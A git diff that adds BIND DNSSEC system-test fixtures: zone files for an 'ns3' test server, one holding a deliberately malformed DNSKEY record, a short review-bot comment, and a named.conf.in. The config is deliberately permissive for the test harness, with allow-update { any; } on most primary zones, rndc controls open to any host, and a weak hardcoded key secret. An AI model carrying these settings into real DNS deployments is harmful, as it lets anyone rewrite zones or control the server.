diff --git a/bin/tests/system/dnssec/ns3/bogus.example.db.in b/bin/tests/system/dnssec/ns3/bogus.example.db.in
new file mode 100644
index 0000000..0feb441
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/bogus.example.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+d A 10.0.0.4
+z A 10.0.0.26
diff --git a/bin/tests/system/dnssec/ns3/dname-at-apex-nsec3.example.db.in b/bin/tests/system/dnssec/ns3/dname-at-apex-nsec3.example.db.in
new file mode 100644
index 0000000..e758cdd
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/dname-at-apex-nsec3.example.db.in
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns3.example. . 1 1200 1200 1814400 3600
+@ NS ns3.example.
+@ DNAME example.
diff --git a/bin/tests/system/dnssec/ns3/dnskey-nsec3-unknown.example.db.in b/bin/tests/system/dnssec/ns3/dnskey-nsec3-unknown.example.db.in
new file mode 100644
index 0000000..f37dd75
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/dnskey-nsec3-unknown.example.db.in
@@ -0,0 +1,29 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+*.e A 10.0.0.6
+child NS ns2.example.
diff --git a/bin/tests/system/dnssec/ns3/dnskey-unknown.example.db.in b/bin/tests/system/dnssec/ns3/dnskey-unknown.example.db.in
new file mode 100644
index 0000000..f37dd75
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/dnskey-unknown.example.db.in
@@ -0,0 +1,29 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+*.e A 10.0.0.6
+child NS ns2.example.
diff --git a/bin/tests/system/dnssec/ns3/dnskey-unsupported-2.example.db.in b/bin/tests/system/dnssec/ns3/dnskey-unsupported-2.example.db.in
new file mode 100644
index 0000000..f37dd75
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/dnskey-unsupported-2.example.db.in
@@ -0,0 +1,29 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+*.e A 10.0.0.6
+child NS ns2.example.
diff --git a/bin/tests/system/dnssec/ns3/dnskey-unsupported.example.db.in b/bin/tests/system/dnssec/ns3/dnskey-unsupported.example.db.in
new file mode 100644
index 0000000..f37dd75
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/dnskey-unsupported.example.db.in
@@ -0,0 +1,29 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+*.e A 10.0.0.6
+child NS ns2.example.
diff --git a/bin/tests/system/dnssec/ns3/dynamic.example.db.in b/bin/tests/system/dnssec/ns3/dynamic.example.db.in
new file mode 100644
index 0000000..babf54c
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/dynamic.example.db.in
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This has the NS and glue at the apex because testing RT #2399
+; requires we have only one name in the zone at a certain point
+; during the test.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+@ NS @
+@ A 10.53.0.3
diff --git a/bin/tests/system/dnssec/ns3/expired.example.db.in b/bin/tests/system/dnssec/ns3/expired.example.db.in
new file mode 100644
index 0000000..b7706d3
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/expired.example.db.in
@@ -0,0 +1,44 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ MX 10 mx
+ns A 10.53.0.3
+mx A 10.0.0.30
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
+nosoa NS ns.nosoa
+ns.nosoa A 10.53.0.7
+
+normalthenrrsig A 10.0.0.28
+rrsigonly A 10.0.0.29
+
+
diff --git a/bin/tests/system/dnssec/ns3/expiring.example.db.in b/bin/tests/system/dnssec/ns3/expiring.example.db.in
new file mode 100644
index 0000000..8acf7b1
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/expiring.example.db.in
@@ -0,0 +1,40 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ MX 10 mx
+ns A 10.53.0.3
+mx A 10.0.0.30
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+*.wild A 10.0.0.6
+child NS ns2.example.
+insecure NS ns.insecure
+ns.insecure A 10.53.0.3
+secure NS ns.secure
+ns.secure A 10.53.0.3
+nsec3 NS ns.nsec3
+ns.nsec3 A 10.53.0.3
+optout NS ns.optout
+ns.optout A 10.53.0.3
+02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17
diff --git a/bin/tests/system/dnssec/ns3/future.example.db.in b/bin/tests/system/dnssec/ns3/future.example.db.in
new file mode 100644
index 0000000..20c19c5
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/future.example.db.in
@@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +child NS ns2.example. +insecure.empty NS ns.insecure.empty +ns.insecure.empty A 10.53.0.3 +foo.*.empty-wild NS ns diff --git a/bin/tests/system/dnssec/ns3/generic.example.db.in b/bin/tests/system/dnssec/ns3/generic.example.db.in new file mode 100644 index 0000000..5cc3ecc --- /dev/null +++ b/bin/tests/system/dnssec/ns3/generic.example.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a.b A 10.0.0.1 
diff --git a/bin/tests/system/dnssec/ns3/inline.example.db b/bin/tests/system/dnssec/ns3/inline.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/inline.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/insecure.below-cname.example.db b/bin/tests/system/dnssec/ns3/insecure.below-cname.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/insecure.below-cname.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 
diff --git a/bin/tests/system/dnssec/ns3/insecure.example.db b/bin/tests/system/dnssec/ns3/insecure.example.db
new file mode 100644
index 0000000..76e3f47
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/insecure.example.db
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x DNSKEY 258 3 5 Cg==
+z A 10.0.0.26
diff --git a/bin/tests/system/dnssec/ns3/insecure.nsec3.example.db b/bin/tests/system/dnssec/ns3/insecure.nsec3.example.db
new file mode 100644
index 0000000..14971bd
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/insecure.nsec3.example.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
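Review bot: In insecure.example.db the record `x DNSKEY 258 3 5 Cg==` carries no comment, and a DNSKEY at a non-apex name with one byte of key data, in a zone that named.conf.in loads unsigned, reads like a leftover to anyone who does not know the test behind it. A comment line above the record would settle that, for example `; deliberately malformed DNSKEY below the apex, not a signing key`, adjusted by whoever knows which check consumes it. insecure2.example.db adds the same record with the same gap.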
diff --git a/bin/tests/system/dnssec/ns3/insecure.optout.example.db b/bin/tests/system/dnssec/ns3/insecure.optout.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/insecure.optout.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/insecure2.example.db b/bin/tests/system/dnssec/ns3/insecure2.example.db new file mode 100644 index 0000000..76e3f47 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/insecure2.example.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x DNSKEY 258 3 5 Cg== +z A 10.0.0.26 
diff --git a/bin/tests/system/dnssec/ns3/key.db.in b/bin/tests/system/dnssec/ns3/key.db.in new file mode 100644 index 0000000..0165e3f --- /dev/null +++ b/bin/tests/system/dnssec/ns3/key.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/dnssec/ns3/kskonly.example.db.in b/bin/tests/system/dnssec/ns3/kskonly.example.db.in new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/kskonly.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/dnssec/ns3/lower.example.db.in b/bin/tests/system/dnssec/ns3/lower.example.db.in new file mode 100644 index 0000000..a04793e --- /dev/null 
+++ b/bin/tests/system/dnssec/ns3/lower.example.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA MNAME1. . ( + 2012042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS NS +NS A 10.53.0.3 diff --git a/bin/tests/system/dnssec/ns3/managed-future.example.db.in b/bin/tests/system/dnssec/ns3/managed-future.example.db.in new file mode 100644 index 0000000..20c19c5 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/managed-future.example.db.in @@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +child NS ns2.example. +insecure.empty NS ns.insecure.empty +ns.insecure.empty A 10.53.0.3 +foo.*.empty-wild NS ns 
diff --git a/bin/tests/system/dnssec/ns3/multiple.example.db.in b/bin/tests/system/dnssec/ns3/multiple.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/multiple.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. diff --git a/bin/tests/system/dnssec/ns3/named.conf.in b/bin/tests/system/dnssec/ns3/named.conf.in new file mode 100644 index 0000000..bd0771d --- /dev/null +++ b/bin/tests/system/dnssec/ns3/named.conf.in 
@@ -0,0 +1,382 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+ session-keyfile "session.key";
+ minimal-responses no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ file "example.bk";
+};
+
+zone "secure.example" {
+ type primary;
+ file "secure.example.db.signed";
+ allow-update { any; };
+};
+
+zone "bogus.example" {
+ type primary;
+ file "bogus.example.db.signed";
+ allow-update { any; };
+};
+
+zone "badds.example" {
+ type primary;
+ file "badds.example.db.signed";
+ allow-update { any; };
+};
+
+zone "dynamic.example" {
+ type primary;
+ file "dynamic.example.db.signed";
+ allow-update { any; };
+};
+
+zone "insecure.example" {
+ type primary;
+ file "insecure.example.db";
+ allow-update { any; };
+};
+
+zone "insecure2.example" {
+ type primary;
+ file "insecure2.example.db";
+ allow-update { any; };
+};
+
+zone "insecure.nsec3.example" {
+ type primary;
+ file "insecure.nsec3.example.db";
+ allow-update { any; };
+};
+
+zone "insecure.optout.example" {
+ type primary;
+ file "insecure.optout.example.db";
+ allow-update { any; };
+};
+
+zone "keyless.example" {
+ type primary;
+ file "keyless.example.db.signed";
+};
+
+zone "nsec3.example" {
+ type primary;
+ file "nsec3.example.db.signed";
+};
+
+zone "optout.nsec3.example" {
+ type primary;
+ file "optout.nsec3.example.db.signed";
+};
+
+zone "nsec3.nsec3.example" {
+ type primary;
+ file "nsec3.nsec3.example.db.signed";
+};
+
+zone "secure.nsec3.example" {
+ type primary;
+ file "secure.nsec3.example.db.signed";
+};
+
+zone "optout.example" {
+ type primary;
+ file "optout.example.db.signed";
+};
+
+zone "secure.optout.example" {
+ type primary;
+ file "secure.optout.example.db.signed";
+};
+
+zone "nsec3.optout.example" {
+ type primary;
+ file "nsec3.optout.example.db.signed";
+};
+
+zone "optout.optout.example" {
+ type primary;
+ file "optout.optout.example.db.signed";
+};
+
+zone "nsec3-unknown.example" {
+ type primary;
+ nsec3-test-zone yes;
+ file "nsec3-unknown.example.db.signed";
+};
+
+zone "optout-unknown.example" {
+ type primary;
+ nsec3-test-zone yes;
+ file "optout-unknown.example.db.signed";
+};
+
+zone "dnskey-unknown.example" {
+ type primary;
+ file "dnskey-unknown.example.db.signed";
+};
+
+zone "dnskey-unsupported.example" {
+ type primary;
+ file "dnskey-unsupported.example.db.signed";
+};
+
+zone "dnskey-unsupported-2.example" {
+ type primary;
+ file "dnskey-unsupported-2.example.db.signed";
+};
+
+zone "dnskey-nsec3-unknown.example" {
+ type primary;
+ nsec3-test-zone yes;
+ file "dnskey-nsec3-unknown.example.db.signed";
+};
+
+zone "multiple.example" {
+ type primary;
+ file "multiple.example.db.signed";
+ allow-update { any; };
+};
+
+zone "rfc2335.example" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ file "rfc2335.example.bk";
+};
+
+zone "rsasha256.example" {
+ type primary;
+ file "rsasha256.example.db.signed";
+};
+
+zone "rsasha512.example" {
+ type primary;
+ file "rsasha512.example.db.signed";
+};
+
+zone "kskonly.example" {
+ type primary;
+ file "kskonly.example.db.signed";
+};
+
+zone "expired.example" {
+ type primary;
+ allow-update { none; };
+ file "expired.example.db.signed";
+};
+
+zone "update-nsec3.example" {
+ type primary;
+ allow-update { any; };
+ file "update-nsec3.example.db.signed";
+};
+
+zone "auto-nsec.example" {
+ type primary;
+ auto-dnssec maintain;
+ allow-update { !0.0.0.0; };
+ file "auto-nsec.example.db.signed";
+};
+
+zone "auto-nsec3.example" {
+ type primary;
+ auto-dnssec maintain;
+ allow-update { !0.0.0.0; };
+ file "auto-nsec3.example.db.signed";
+};
+
+zone "insecure.below-cname.example" {
+ type primary;
+ file "insecure.below-cname.example.db";
+};
+
+zone "secure.below-cname.example" {
+ type primary;
+ file "secure.below-cname.example.db.signed";
+};
+
+zone "ttlpatch.example" {
+ type primary;
+ file "ttlpatch.example.db.patched";
+};
+
+zone "split-dnssec.example" {
+ type primary;
+ file "split-dnssec.example.db";
+};
+
+zone "split-smart.example" {
+ type primary;
+ file "split-smart.example.db";
+};
+
+zone "nsec3chain-test" {
+ type secondary;
+ file "nsec3chain-test.bk";
+ primaries { 10.53.0.2; };
+};
+
+zone "expiring.example" {
+ type primary;
+ allow-update { any; };
+ file "expiring.example.db.signed";
+};
+
+zone "nosign.example" {
+ type primary;
+ allow-update { any; };
+ dnssec-update-mode no-resign;
+ file "nosign.example.db.signed";
+};
+
+zone "upper.example" {
+ type primary;
+ file "upper.example.db.signed";
+};
+
+zone "LOWER.EXAMPLE" {
+ type primary;
+ file "lower.example.db.signed";
+};
+
